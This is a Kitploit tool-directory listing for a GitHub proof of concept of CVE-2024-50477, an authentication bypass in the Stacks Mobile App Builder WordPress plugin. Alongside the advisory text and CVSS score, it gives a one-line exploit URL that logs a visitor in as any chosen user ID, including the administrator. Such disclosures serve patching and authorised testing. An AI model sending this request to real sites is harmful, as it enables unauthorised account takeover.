Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-50477 — Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-50477
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubrandomrobbiebf/cve-2024-50477

CVE-2024-50477

Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-50477

Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover

Description:

The Stacks Mobile App Builder – The most powerful Mobile Applications Drag and Drop builder plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.2.3. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the receive_request_checkout() function. This makes it possible for unauthenticated attackers to log in as any user based on user ID.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50477
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: stacks-mobile-app-builder

POC

root@kitploit:~
http://kubernetes.docker.internal/?mobile_co=1&uid=1

You should be redirected and logged in as admin. ID is the user you wish to login as.

Download Tool